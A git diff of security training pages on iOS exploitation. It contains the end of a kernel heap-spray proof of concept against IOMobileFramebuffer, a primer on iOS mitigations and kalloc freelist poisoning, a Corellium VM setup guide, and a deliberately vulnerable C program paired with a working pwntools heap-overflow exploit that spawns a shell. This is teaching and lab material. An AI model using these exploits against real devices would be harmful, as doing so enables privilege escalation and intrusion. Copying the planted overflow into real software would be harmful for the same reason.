// object was at that OOB slot (ideally an IOSurface you sprayed).
|
||||
printf("[*] external method 83 returned: 0x%llx\n", output_scalars[0]);
|
||||
return output_scalars[0];
|
||||
}
|
||||
|
||||
// Heap-shape with IOSurfaces so an OOB slot likely contains a pointer to a
|
||||
// real IOSurface (easier & stabler than a fully fake object).
|
||||
bool do_spray(void) {
|
||||
char data[0x10];
|
||||
memset(data, 0x41, sizeof(data)); // Tiny payload for value spraying.
|
||||
|
||||
// Get IOSurfaceRootUserClient (reachable from sandbox/WebContent).
|
||||
io_connect_t iosurface_uc = get_iosurface_root_uc();
|
||||
if (iosurface_uc == MACH_PORT_NULL) {
|
||||
printf("[-] do_spray: failed to allocate new iosurface_uc\n");
|
||||
return false;
|
||||
}
|
||||
|
||||
// Create many IOSurfaces and use set_value / value spray helpers
|
||||
// (Brandon Azad-style) to fan out allocations in kalloc. ⭐
|
||||
int *surface_ids = (int*)malloc(SURFACES_COUNT * sizeof(int));
|
||||
for (size_t i = 0; i < SURFACES_COUNT; ++i) {
|
||||
surface_ids[i] = create_surface(iosurface_uc); // s_create_surface
|
||||
if (surface_ids[i] <= 0) {
|
||||
return false;
|
||||
}
|
||||
|
||||
// Spray small values repeatedly: tends to allocate/fill predictable
|
||||
// kalloc regions near where the IOMFB table OOB will read from.
|
||||
// The “with_gc” flavor forces periodic GC to keep memory moving/packed.
|
||||
if (IOSurface_spray_with_gc(iosurface_uc, surface_ids[i],
|
||||
20, 200, // rounds, per-round items
|
||||
data, sizeof(data),
|
||||
NULL) == false) {
|
||||
printf("iosurface spray failed\n");
|
||||
return false;
|
||||
}
|
||||
}
|
||||
return true;
|
||||
}
|
||||
|
||||
int main(void) {
|
||||
// Ensure we can talk to IOSurfaceRoot (some helpers depend on it).
|
||||
io_connect_t iosurface_uc = get_iosurface_root_uc();
|
||||
if (iosurface_uc == MACH_PORT_NULL) {
|
||||
return 0;
|
||||
}
|
||||
|
||||
printf("[*] do spray\n");
|
||||
if (do_spray() == false) {
|
||||
printf("[-] shape failed, abort\n");
|
||||
return 1;
|
||||
}
|
||||
printf("[*] spray success\n");
|
||||
|
||||
// Trigger the OOB read. The magic constant chooses a pointer-slot
|
||||
// far beyond the legit array (offset is in bytes; index = offset/8).
|
||||
// If the spray worked, this returns a **Mach port name** (handle) to one
|
||||
// of your sprayed IOSurfaces; otherwise it may crash.
|
||||
printf("[*] trigger\n");
|
||||
trigger_oob(0x1200000 + 0x1048);
|
||||
return 0;
|
||||
}
|
||||
```
|
||||
|
||||
## References
|
||||
- [Original writeup by Saar Amar](https://saaramar.github.io/IOMobileFrameBuffer_LPE_POC/)
|
||||
- [Exploit PoC code](https://github.com/saaramar/IOMobileFrameBuffer_LPE_POC)
|
||||
- [Research from jsherman212](https://jsherman212.github.io/2021/11/28/popping_ios14_with_iomfb.html?utm_source=chatgpt.com)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
276
src/binary-exploitation/ios-exploiting/README.md
Normal file
276
src/binary-exploitation/ios-exploiting/README.md
Normal file
@ -0,0 +1,276 @@
|
||||
# iOS Exploiting
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## iOS Exploit Mitigations
|
||||
|
||||
- **Code Signing** in iOS works by requiring every piece of executable code (apps, libraries, extensions, etc.) to be cryptographically signed with a certificate issued by Apple. When code is loaded, iOS verifies the digital signature against Apple’s trusted root. If the signature is invalid, missing, or modified, the OS refuses to run it. This prevents attackers from injecting malicious code into legitimate apps or running unsigned binaries, effectively stopping most exploit chains that rely on executing arbitrary or tampered code.
|
||||
- **CoreTrust** is the iOS subsystem responsible for enforcing code signing at runtime. It directly verifies signatures using Apple’s root certificate without relying on cached trust stores, meaning only binaries signed by Apple (or with valid entitlements) can execute. CoreTrust ensures that even if an attacker tampers with an app after installation, modifies system libraries, or tries to load unsigned code, the system will block execution unless the code is still properly signed. This strict enforcement closes many post-exploitation vectors that older iOS versions allowed through weaker or bypassable signature checks.
|
||||
- **Data Execution Prevention (DEP)** marks memory regions as non-executable unless they explicitly contain code. This stops attackers from injecting shellcode into data regions (like the stack or heap) and running it, forcing them to rely on more complex techniques like ROP (Return-Oriented Programming).
|
||||
- **ASLR (Address Space Layout Randomization)** randomizes the memory addresses of code, libraries, stack, and heap every time the system runs. This makes it much harder for attackers to predict where useful instructions or gadgets are, breaking many exploit chains that depend on fixed memory layouts.
|
||||
- **KASLR (Kernel ASLR)** applies the same randomization concept to the iOS kernel. By shuffling the kernel’s base address at each boot, it prevents attackers from reliably locating kernel functions or structures, raising the difficulty of kernel-level exploits that would otherwise gain full system control.
|
||||
- **Kernel Patch Protection (KPP)** also known as **AMCC (Apple Mobile File Integrity)** in iOS, continuously monitors the kernel’s code pages to ensure they haven’t been modified. If any tampering is detected—such as an exploit trying to patch kernel functions or insert malicious code—the device will immediately panic and reboot. This protection makes persistent kernel exploits far harder, as attackers can’t simply hook or patch kernel instructions without triggering a system crash.
|
||||
- **Kernel Text Readonly Region (KTRR)** is a hardware-based security feature introduced on iOS devices. It uses the CPU’s memory controller to mark the kernel’s code (text) section as permanently read-only after boot. Once locked, even the kernel itself cannot modify this memory region. This prevents attackers—and even privileged code—from patching kernel instructions at runtime, closing off a major class of exploits that relied on modifying kernel code directly.
|
||||
- **Pointer Authentication Codes (PAC)** use cryptographic signatures embedded into unused bits of pointers to verify their integrity before use. When a pointer (like a return address or function pointer) is created, the CPU signs it with a secret key; before dereferencing, the CPU checks the signature. If the pointer was tampered with, the check fails and execution stops. This prevents attackers from forging or reusing corrupted pointers in memory corruption exploits, making techniques like ROP or JOP much harder to pull off reliably.
|
||||
- **Privilege Access never (PAN)** is a hardware feature that prevents the kernel (privileged mode) from directly accessing user-space memory unless it explicitly enables access. This stops attackers who gained kernel code execution from easily reading or writing user memory to escalate exploits or steal sensitive data. By enforcing strict separation, PAN reduces the impact of kernel exploits and blocks many common privilege-escalation techniques.
|
||||
- **Page Protection Layer (PPL)** is an iOS security mechanism that protects critical kernel-managed memory regions, especially those related to code signing and entitlements. It enforces strict write protections using the MMU (Memory Management Unit) and additional checks, ensuring that even privileged kernel code cannot arbitrarily modify sensitive pages. This prevents attackers who gain kernel-level execution from tampering with security-critical structures, making persistence and code-signing bypasses significantly harder.
|
||||
|
||||
## Old Kernel Heap (Pre-iOS 15 / Pre-A12 era)
|
||||
|
||||
The kernel used a **zone allocator** (`kalloc`) divided into fixed-size "zones."
|
||||
Each zone only stores allocations of a single size class.
|
||||
|
||||
From the screenshot:
|
||||
|
||||
| Zone Name | Element Size | Example Use |
|
||||
|----------------------|--------------|-----------------------------------------------------------------------------|
|
||||
| `default.kalloc.16` | 16 bytes | Very small kernel structs, pointers. |
|
||||
| `default.kalloc.32` | 32 bytes | Small structs, object headers. |
|
||||
| `default.kalloc.64` | 64 bytes | IPC messages, tiny kernel buffers. |
|
||||
| `default.kalloc.128` | 128 bytes | Medium objects like parts of `OSObject`. |
|
||||
| `default.kalloc.256` | 256 bytes | Larger IPC messages, arrays, device structures. |
|
||||
| … | … | … |
|
||||
| `default.kalloc.1280`| 1280 bytes | Large structures, IOSurface/graphics metadata. |
|
||||
|
||||
**How it worked:**
|
||||
- Each allocation request gets **rounded up** to the nearest zone size.
|
||||
(E.g., a 50-byte request lands in the `kalloc.64` zone).
|
||||
- Memory in each zone was kept in a **free list** — chunks freed by the kernel went back into that zone.
|
||||
- If you overflowed a 64-byte buffer, you’d overwrite the **next object in the same zone**.
|
||||
|
||||
This is why **heap spraying / feng shui** was so effective: you could predict object neighbors by spraying allocations of the same size class.
|
||||
|
||||
### The freelist
|
||||
|
||||
Inside each kalloc zone, freed objects weren’t returned directly to the system — they went into a freelist, a linked list of available chunks.
|
||||
|
||||
- When a chunk was freed, the kernel wrote a pointer at the start of that chunk → the address of the next free chunk in the same zone.
|
||||
|
||||
- The zone kept a HEAD pointer to the first free chunk.
|
||||
|
||||
- Allocation always used the current HEAD:
|
||||
|
||||
1. Pop HEAD (return that memory to the caller).
|
||||
|
||||
2. Update HEAD = HEAD->next (stored in the freed chunk’s header).
|
||||
|
||||
- Freeing pushed chunks back:
|
||||
|
||||
- `freed_chunk->next = HEAD`
|
||||
|
||||
- `HEAD = freed_chunk`
|
||||
|
||||
So the freelist was just a linked list built inside the freed memory itself.
|
||||
|
||||
Normal state:
|
||||
|
||||
```
|
||||
Zone page (64-byte chunks for example):
|
||||
[ A ] [ F ] [ F ] [ A ] [ F ] [ A ] [ F ]
|
||||
|
||||
Freelist view:
|
||||
HEAD ──► [ F ] ──► [ F ] ──► [ F ] ──► [ F ] ──► NULL
|
||||
(next ptrs stored at start of freed chunks)
|
||||
```
|
||||
|
||||
### Exploiting the freelist
|
||||
|
||||
Because the first 8 bytes of a free chunk = freelist pointer, an attacker could corrupt it:
|
||||
|
||||
1. **Heap overflow** into an adjacent freed chunk → overwrite its “next” pointer.
|
||||
|
||||
2. **Use-after-free** write into a freed object → overwrite its “next” pointer.
|
||||
|
||||
Then, on the next allocation of that size:
|
||||
|
||||
- The allocator pops the corrupted chunk.
|
||||
|
||||
- Follows the attacker-supplied “next” pointer.
|
||||
|
||||
- Returns a pointer to arbitrary memory, enabling fake object primitives or targeted overwrite.
|
||||
|
||||
Visual example of freelist poisoning:
|
||||
|
||||
```
|
||||
Before corruption:
|
||||
HEAD ──► [ F1 ] ──► [ F2 ] ──► [ F3 ] ──► NULL
|
||||
|
||||
After attacker overwrite of F1->next:
|
||||
HEAD ──► [ F1 ]
|
||||
(next) ──► 0xDEAD_BEEF_CAFE_BABE (attacker-chosen)
|
||||
|
||||
Next alloc of this zone → kernel hands out memory at attacker-controlled address.
|
||||
```
|
||||
|
||||
This freelist design made exploitation highly effective pre-hardening: predictable neighbors from heap sprays, raw pointer freelist links, and no type separation allowed attackers to escalate UAF/overflow bugs into arbitrary kernel memory control.
|
||||
|
||||
### Heap Grooming / Feng Shui
|
||||
The goal of heap grooming is to **shape the heap layout** so that when an attacker triggers an overflow or use-after-free, the target (victim) object sits right next to an attacker-controlled object.\
|
||||
That way, when memory corruption happens, the attacker can reliably overwrite the victim object with controlled data.
|
||||
|
||||
**Steps:**
|
||||
|
||||
1. Spray allocations (fill the holes)
|
||||
- Over time, the kernel heap gets fragmented: some zones have holes where old
|
||||
objects were freed.
|
||||
- The attacker first makes lots of dummy allocations to fill these gaps, so
|
||||
the heap becomes “packed” and predictable.
|
||||
|
||||
2. Force new pages
|
||||
- Once the holes are filled, the next allocations must come from new pages
|
||||
added to the zone.
|
||||
- Fresh pages mean objects will be clustered together, not scattered across
|
||||
old fragmented memory.
|
||||
- This gives the attacker much better control of neighbors.
|
||||
|
||||
3. Place attacker objects
|
||||
- The attacker now sprays again, creating lots of attacker-controlled objects
|
||||
in those new pages.
|
||||
- These objects are predictable in size and placement (since they all belong
|
||||
to the same zone).
|
||||
|
||||
4. Free a controlled object (make a gap)
|
||||
- The attacker deliberately frees one of their own objects.
|
||||
- This creates a “hole” in the heap, which the allocator will later reuse for
|
||||
the next allocation of that size.
|
||||
|
||||
5. Victim object lands in the hole
|
||||
- The attacker triggers the kernel to allocate the victim object (the one
|
||||
they want to corrupt).
|
||||
- Since the hole is the first available slot in the freelist, the victim is
|
||||
placed exactly where the attacker freed their object.
|
||||
|
||||
6. Overflow / UAF into victim
|
||||
- Now the attacker has attacker-controlled objects around the victim.
|
||||
- By overflowing from one of their own objects (or reusing a freed one), they
|
||||
can reliably overwrite the victim’s memory fields with chosen values.
|
||||
|
||||
**Why it works**:
|
||||
|
||||
- Zone allocator predictability: allocations of the same size always come from
|
||||
the same zone.
|
||||
- Freelist behavior: new allocations reuse the most recently freed chunk first.
|
||||
- Heap sprays: attacker fills memory with predictable content and controls layout.
|
||||
- End result: attacker controls where the victim object lands and what data sits
|
||||
next to it.
|
||||
|
||||
---
|
||||
|
||||
## Modern Kernel Heap (iOS 15+/A12+ SoCs)
|
||||
|
||||
Apple hardened the allocator and made **heap grooming much harder**:
|
||||
|
||||
### 1. From Classic kalloc to kalloc_type
|
||||
- **Before**: a single `kalloc.<size>` zone existed for each size class (16, 32, 64, … 1280, etc.). Any object of that size was placed there → attacker objects could sit next to privileged kernel objects.
|
||||
- **Now**:
|
||||
- Kernel objects are allocated from **typed zones** (`kalloc_type`).
|
||||
- Each type of object (e.g., `ipc_port_t`, `task_t`, `OSString`, `OSData`) has its own dedicated zone, even if they’re the same size.
|
||||
- The mapping between object type ↔ zone is generated from the **kalloc_type system** at compile time.
|
||||
|
||||
An attacker can no longer guarantee that controlled data (`OSData`) ends up adjacent to sensitive kernel objects (`task_t`) of the same size.
|
||||
|
||||
### 2. Slabs and Per-CPU Caches
|
||||
- The heap is divided into **slabs** (pages of memory carved into fixed-size chunks for that zone).
|
||||
- Each zone has a **per-CPU cache** to reduce contention.
|
||||
- Allocation path:
|
||||
1. Try per-CPU cache.
|
||||
2. If empty, pull from the global freelist.
|
||||
3. If freelist is empty, allocate a new slab (one or more pages).
|
||||
- **Benefit**: This decentralization makes heap sprays less deterministic, since allocations may be satisfied from different CPUs’ caches.
|
||||
|
||||
### 3. Randomization inside zones
|
||||
- Within a zone, freed elements are not handed back in simple FIFO/LIFO order.
|
||||
- Modern XNU uses **encoded freelist pointers** (safe-linking like Linux, introduced ~iOS 14).
|
||||
- Each freelist pointer is **XOR-encoded** with a per-zone secret cookie.
|
||||
- This prevents attackers from forging a fake freelist pointer if they gain a write primitive.
|
||||
- Some allocations are **randomized in their placement within a slab**, so spraying doesn’t guarantee adjacency.
|
||||
|
||||
### 4. Guarded Allocations
|
||||
- Certain critical kernel objects (e.g., credentials, task structures) are allocated in **guarded zones**.
|
||||
- These zones insert **guard pages** (unmapped memory) between slabs or use **redzones** around objects.
|
||||
- Any overflow into the guard page triggers a fault → immediate panic instead of silent corruption.
|
||||
|
||||
### 5. Page Protection Layer (PPL) and SPTM
|
||||
- Even if you control a freed object, you can’t modify all of kernel memory:
|
||||
- **PPL (Page Protection Layer)** enforces that certain regions (e.g., code signing data, entitlements) are **read-only** even to the kernel itself.
|
||||
- On **A15/M2+ devices**, this role is replaced/enhanced by **SPTM (Secure Page Table Monitor)** + **TXM (Trusted Execution Monitor)**.
|
||||
- These hardware-enforced layers mean attackers can’t escalate from a single heap corruption to arbitrary patching of critical security structures.
|
||||
|
||||
### 6. Large Allocations
|
||||
- Not all allocations go through `kalloc_type`.
|
||||
- Very large requests (above ~16KB) bypass typed zones and are served directly from **kernel VM (kmem)** via page allocations.
|
||||
- These are less predictable, but also less exploitable, since they don’t share slabs with other objects.
|
||||
|
||||
### 7. Allocation Patterns Attackers Target
|
||||
Even with these protections, attackers still look for:
|
||||
- **Reference count objects**: if you can tamper with retain/release counters, you may cause use-after-free.
|
||||
- **Objects with function pointers (vtables)**: corrupting one still yields control flow.
|
||||
- **Shared memory objects (IOSurface, Mach ports)**: these are still attack targets because they bridge user ↔ kernel.
|
||||
|
||||
But — unlike before — you can’t just spray `OSData` and expect it to neighbor a `task_t`. You need **type-specific bugs** or **info leaks** to succeed.
|
||||
|
||||
### Example: Allocation Flow in Modern Heap
|
||||
|
||||
Suppose userspace calls into IOKit to allocate an `OSData` object:
|
||||
|
||||
1. **Type lookup** → `OSData` maps to `kalloc_type_osdata` zone (size 64 bytes).
|
||||
2. Check per-CPU cache for free elements.
|
||||
- If found → return one.
|
||||
- If empty → go to global freelist.
|
||||
- If freelist empty → allocate a new slab (page of 4KB → 64 chunks of 64 bytes).
|
||||
3. Return chunk to caller.
|
||||
|
||||
**Freelist pointer protection**:
|
||||
- Each freed chunk stores the address of the next free chunk, but encoded with a secret key.
|
||||
- Overwriting that field with attacker data won’t work unless you know the key.
|
||||
|
||||
|
||||
## Comparison Table
|
||||
|
||||
| Feature | **Old Heap (Pre-iOS 15)** | **Modern Heap (iOS 15+ / A12+)** |
|
||||
|---------------------------------|------------------------------------------------------------|--------------------------------------------------|
|
||||
| Allocation granularity | Fixed size buckets (`kalloc.16`, `kalloc.32`, etc.) | Size + **type-based buckets** (`kalloc_type`) |
|
||||
| Placement predictability | High (same-size objects side by side) | Low (same-type grouping + randomness) |
|
||||
| Freelist management | Raw pointers in freed chunks (easy to corrupt) | **Encoded pointers** (safe-linking style) |
|
||||
| Adjacent object control | Easy via sprays/frees (feng shui predictable) | Hard — typed zones separate attacker objects |
|
||||
| Kernel data/code protections | Few hardware protections | **PPL / SPTM** protect page tables & code pages |
|
||||
| Exploit reliability | High with heap sprays | Much lower, requires logic bugs or info leaks |
|
||||
|
||||
## (Old) Physical Use-After-Free via IOSurface
|
||||
|
||||
{{#ref}}
|
||||
ios-physical-uaf-iosurface.md
|
||||
{{#endref}}
|
||||
|
||||
---
|
||||
|
||||
## Ghidra Install BinDiff
|
||||
|
||||
Download BinDiff DMG from [https://www.zynamics.com/bindiff/manual](https://www.zynamics.com/bindiff/manual) and install it.
|
||||
|
||||
Open Ghidra with `ghidraRun` and go to `File` --> `Install Extensions`, press the add button and select the path `/Applications/BinDiff/Extra/Ghidra/BinExport` and click OK and isntall it even if there is a version mismatch.
|
||||
|
||||
### Using BinDiff with Kernel versions
|
||||
|
||||
1. Go to the page [https://ipsw.me/](https://ipsw.me/) and download the iOS versions you want to diff. These will be `.ipsw` files.
|
||||
2. Decompress until you get the bin format of the kernelcache of both `.ipsw` files. You have information on how to do this on:
|
||||
|
||||
{{#ref}}
|
||||
../../macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
|
||||
{{#endref}}
|
||||
|
||||
3. Open Ghidra with `ghidraRun`, create a new project and load the kernelcaches.
|
||||
4. Open each kernelcache so they are automatically analyzed by Ghidra.
|
||||
5. Then, on the project Window of Ghidra, right click each kernelcache, select `Export`, select format `Binary BinExport (v2) for BinDiff` and export them.
|
||||
6. Open BinDiff, create a new workspace and add a new diff indicating as primary file the kernelcache that contains the vulnerability and as secondary file the patched kernelcache.
|
||||
|
||||
---
|
||||
|
||||
## Finding the right XNU version
|
||||
|
||||
If you want to check for vulnerabilities in a specific version of iOS, you can check which XNU release version the iOS version uses at [https://www.theiphonewiki.com/wiki/kernel]https://www.theiphonewiki.com/wiki/kernel).
|
||||
|
||||
For example, the versions `15.1 RC`, `15.1` and `15.1.1` use the version `Darwin Kernel Version 21.1.0: Wed Oct 13 19:14:48 PDT 2021; root:xnu-8019.43.1~1/RELEASE_ARM64_T8006`.
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
84
src/binary-exploitation/ios-exploiting/ios-corellium.md
Normal file
84
src/binary-exploitation/ios-exploiting/ios-corellium.md
Normal file
@ -0,0 +1,84 @@
|
||||
# iOS How to Connect to Corellium
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## **Prereqs**
|
||||
- A Corellium iOS VM (jailbroken or not). In this guide we assume you have access to Corellium.
|
||||
- Local tools: **ssh/scp**.
|
||||
- (Optional) **SSH keys** added to your Corellium project for passwordless logins.
|
||||
|
||||
|
||||
## **Connect to the iPhone VM from localhost**
|
||||
|
||||
### A) **Quick Connect (no VPN)**
|
||||
0) Add you ssh key in **`/admin/projects`** (recommended).
|
||||
1) Open the device page → **Connect**
|
||||
2) **Copy the Quick Connect SSH command** shown by Corellium and paste it in your terminal.
|
||||
3) Enter the password or use your key (recommended).
|
||||
|
||||
### B) **VPN → direct SSH**
|
||||
0) Add you ssh key in **`/admin/projects`** (recommended).
|
||||
1) Device page → **CONNECT** → **VPN** → download `.ovpn` and connect with any VPN client that supports TAP mode. (Check [https://support.corellium.com/features/connect/vpn](https://support.corellium.com/features/connect/vpn) if you have issues.)
|
||||
2) SSH to the VM’s **10.11.x.x** address:
|
||||
```bash
|
||||
ssh root@10.11.1.1
|
||||
```
|
||||
|
||||
## **Upload a native binary & execute it**
|
||||
|
||||
### 2.1 **Upload**
|
||||
- If Quick Connect gave you a host/port:
|
||||
```bash
|
||||
scp -J <domain> ./mytool root@10.11.1.1:/var/root/mytool
|
||||
```
|
||||
|
||||
- If using VPN (10.11.x.x):
|
||||
```bash
|
||||
scp ./mytool -J <domain> root@10.11.1.1:/var/root/mytool
|
||||
```
|
||||
|
||||
## **Upload & install an iOS app (.ipa)**
|
||||
|
||||
### Path A — **Web UI (fastest)**
|
||||
1) Device page → **Apps** tab → **Install App** → pick your `.ipa`.
|
||||
2) From the same tab you can **launch/kill/uninstall**.
|
||||
|
||||
### Path B — **Scripted via Corellium Agent**
|
||||
1) Use the API Agent to **upload** then **install**:
|
||||
```js
|
||||
// Node.js (pseudo) using Corellium Agent
|
||||
await agent.upload("./app.ipa", "/var/tmp/app.ipa");
|
||||
await agent.install("/var/tmp/app.ipa", (progress, status) => {
|
||||
console.log(progress, status);
|
||||
});
|
||||
```
|
||||
|
||||
### Path C — **Non-jailbroken (proper signing / Sideloadly)**
|
||||
- If you don’t have a provisioning profile, use **Sideloadly** to re-sign with your Apple ID, or sign in Xcode.
|
||||
- You can also expose the VM to Xcode using **USBFlux** (see §5).
|
||||
|
||||
|
||||
- For quick logs/commands without SSH, use the device **Console** in the UI.
|
||||
|
||||
## **Extras**
|
||||
|
||||
- **Port-forwarding** (make the VM feel local for other tools):
|
||||
```bash
|
||||
# Forward local 2222 -> device 22
|
||||
ssh -N -L 2222:127.0.0.1:22 root@10.11.1.1
|
||||
# Now you can: scp -P 2222 file root@10.11.1.1:/var/root/
|
||||
```
|
||||
|
||||
- **LLDB remote debugging**: use the **LLDB/GDB stub** address shown at the bottom of the device page (CONNECT → LLDB).
|
||||
|
||||
- **USBFlux (macOS/Linux)**: present the VM to **Xcode/Sideloadly** like a cabled device.
|
||||
|
||||
|
||||
## **Common pitfalls**
|
||||
- **Proper signing** is required on **non-jailbroken** devices; unsigned IPAs won’t launch.
|
||||
- **Quick Connect vs VPN**: Quick Connect is simplest; use **VPN** when you need the device on your local network (e.g., local proxies/tools).
|
||||
- **No App Store** on Corellium devices; bring your own (re)signed IPAs.
|
||||
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
@ -0,0 +1,213 @@
|
||||
# iOS How to Connect to Corellium
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## Vuln Code
|
||||
|
||||
```c
|
||||
#define _GNU_SOURCE
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
|
||||
__attribute__((noinline))
|
||||
static void safe_cb(void) {
|
||||
puts("[*] safe_cb() called — nothing interesting here.");
|
||||
}
|
||||
|
||||
__attribute__((noinline))
|
||||
static void win(void) {
|
||||
puts("[+] win() reached — spawning shell...");
|
||||
fflush(stdout);
|
||||
system("/bin/sh");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
typedef void (*cb_t)(void);
|
||||
|
||||
typedef struct {
|
||||
cb_t cb; // <--- Your target: overwrite this with win()
|
||||
char tag[16]; // Cosmetic (helps make the chunk non-tiny)
|
||||
} hook_t;
|
||||
|
||||
static void fatal(const char *msg) {
|
||||
perror(msg);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
int main(void) {
|
||||
// Make I/O deterministic
|
||||
setvbuf(stdout, NULL, _IONBF, 0);
|
||||
|
||||
// Print address leak so exploit doesn't guess ASLR
|
||||
printf("[*] LEAK win() @ %p\n", (void*)&win);
|
||||
|
||||
// 1) Allocate the overflow buffer
|
||||
size_t buf_sz = 128;
|
||||
char *buf = (char*)malloc(buf_sz);
|
||||
if (!buf) fatal("malloc buf");
|
||||
memset(buf, 'A', buf_sz);
|
||||
|
||||
// 2) Allocate the hook object (likely adjacent in same magazine/size class)
|
||||
hook_t *h = (hook_t*)malloc(sizeof(hook_t));
|
||||
if (!h) fatal("malloc hook");
|
||||
h->cb = safe_cb;
|
||||
memcpy(h->tag, "HOOK-OBJ", 8);
|
||||
|
||||
// A tiny bit of noise to look realistic (and to consume small leftover holes)
|
||||
void *spacers[16];
|
||||
for (int i = 0; i < 16; i++) {
|
||||
spacers[i] = malloc(64);
|
||||
if (spacers[i]) memset(spacers[i], 0xCC, 64);
|
||||
}
|
||||
|
||||
puts("[*] You control a write into the 128B buffer (no bounds check).");
|
||||
puts("[*] Enter payload length (decimal), then the raw payload bytes.");
|
||||
|
||||
// 3) Read attacker-chosen length and then read that many bytes → overflow
|
||||
char line[64];
|
||||
if (!fgets(line, sizeof(line), stdin)) fatal("fgets");
|
||||
unsigned long n = strtoul(line, NULL, 10);
|
||||
|
||||
// BUG: no clamp to 128
|
||||
ssize_t got = read(STDIN_FILENO, buf, n);
|
||||
if (got < 0) fatal("read");
|
||||
printf("[*] Wrote %zd bytes into 128B buffer.\n", got);
|
||||
|
||||
// 4) Trigger: call the hook's callback
|
||||
puts("[*] Calling h->cb() ...");
|
||||
h->cb();
|
||||
|
||||
puts("[*] Done.");
|
||||
return 0;
|
||||
}
|
||||
```
|
||||
|
||||
Compile it with:
|
||||
|
||||
```bash
|
||||
clang -O0 -Wall -Wextra -std=c11 -o heap_groom vuln.c
|
||||
```
|
||||
|
||||
|
||||
## Exploit
|
||||
|
||||
> [!WARNING]
|
||||
> This exploit is setting the env variable `MallocNanoZone=0` to disable the NanoZone. This is needed to get adjacent allocations when calling `malloc`with small sizes. Without this different mallocs will be allocated in different zones and won't be adjacent and therefore the overflow won't work as expected.
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
# Heap overflow exploit for macOS ARM64 CTF challenge
|
||||
#
|
||||
# Vulnerability: Buffer overflow in heap-allocated buffer allows overwriting
|
||||
# a function pointer in an adjacent heap chunk.
|
||||
#
|
||||
# Key insights:
|
||||
# 1. macOS uses different heap zones for different allocation sizes
|
||||
# 2. The NanoZone must be disabled (MallocNanoZone=0) to get predictable layout
|
||||
# 3. With spacers allocated after main chunks, the distance is 560 bytes (432 padding needed)
|
||||
#
|
||||
from pwn import *
|
||||
import re
|
||||
import sys
|
||||
import struct
|
||||
import platform
|
||||
|
||||
# Detect architecture and set context accordingly
|
||||
if platform.machine() == 'arm64' or platform.machine() == 'aarch64':
|
||||
context.clear(arch='aarch64')
|
||||
else:
|
||||
context.clear(arch='amd64')
|
||||
|
||||
BIN = './heap_groom'
|
||||
|
||||
def parse_leak(line):
|
||||
m = re.search(rb'win\(\) @ (0x[0-9a-fA-F]+)', line)
|
||||
if not m:
|
||||
log.failure("Couldn't parse leak")
|
||||
sys.exit(1)
|
||||
return int(m.group(1), 16)
|
||||
|
||||
def build_payload(win_addr, extra_pad=0):
|
||||
# We want: [128 bytes padding] + [optional padding for heap metadata] + [overwrite cb pointer]
|
||||
padding = b'A' * 128
|
||||
if extra_pad:
|
||||
padding += b'B' * extra_pad
|
||||
# Add the win address to overwrite the function pointer
|
||||
payload = padding + p64(win_addr)
|
||||
return payload
|
||||
|
||||
def main():
|
||||
# On macOS, we need to disable the Nano zone for adjacent allocations
|
||||
import os
|
||||
env = os.environ.copy()
|
||||
env['MallocNanoZone'] = '0'
|
||||
|
||||
# The correct padding with MallocNanoZone=0 is 432 bytes
|
||||
# This makes the total distance 560 bytes (128 buffer + 432 padding)
|
||||
# Try the known working value first, then alternatives in case of heap variation
|
||||
candidates = [
|
||||
432, # 560 - 128 = 432 (correct padding with spacers and NanoZone=0)
|
||||
424, # Try slightly less in case of alignment differences
|
||||
440, # Try slightly more
|
||||
416, # 16 bytes less
|
||||
448, # 16 bytes more
|
||||
0, # Direct adjacency (unlikely but worth trying)
|
||||
]
|
||||
|
||||
log.info("Starting heap overflow exploit for macOS...")
|
||||
|
||||
for extra in candidates:
|
||||
log.info(f"Trying extra_pad={extra} with MallocNanoZone=0")
|
||||
p = process(BIN, env=env)
|
||||
|
||||
# Read leak line
|
||||
leak_line = p.recvline()
|
||||
win_addr = parse_leak(leak_line)
|
||||
log.success(f"win() @ {hex(win_addr)}")
|
||||
|
||||
# Skip prompt lines
|
||||
p.recvuntil(b"Enter payload length")
|
||||
p.recvline()
|
||||
|
||||
# Build and send payload
|
||||
payload = build_payload(win_addr, extra_pad=extra)
|
||||
total_len = len(payload)
|
||||
|
||||
log.info(f"Sending {total_len} bytes (128 base + {extra} padding + 8 pointer)")
|
||||
|
||||
# Send length and payload
|
||||
p.sendline(str(total_len).encode())
|
||||
p.send(payload)
|
||||
|
||||
# Check if we overwrote the function pointer successfully
|
||||
try:
|
||||
output = p.recvuntil(b"Calling h->cb()", timeout=0.5)
|
||||
p.recvline(timeout=0.5) # Skip the "..." part
|
||||
|
||||
# Check if we hit win()
|
||||
response = p.recvline(timeout=0.5)
|
||||
if b"win() reached" in response:
|
||||
log.success(f"SUCCESS! Overwrote function pointer with extra_pad={extra}")
|
||||
log.success("Shell spawned, entering interactive mode...")
|
||||
p.interactive()
|
||||
return
|
||||
elif b"safe_cb() called" in response:
|
||||
log.info(f"Failed with extra_pad={extra}, safe_cb was called")
|
||||
else:
|
||||
log.info(f"Failed with extra_pad={extra}, unexpected response")
|
||||
except:
|
||||
log.info(f"Failed with extra_pad={extra}, likely crashed")
|
||||
|
||||
p.close()
|
||||
|
||||
log.failure("All padding attempts failed. The heap layout might be different.")
|
||||
log.info("Try running the exploit multiple times as heap layout can be probabilistic.")
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
||||
```
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
@ -1,19 +1,6 @@
|
||||
# iOS Exploiting
|
||||
# iOS Physical Use-After-Free via IOSurface
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
## iOS Exploit Mitigations
|
||||
|
||||
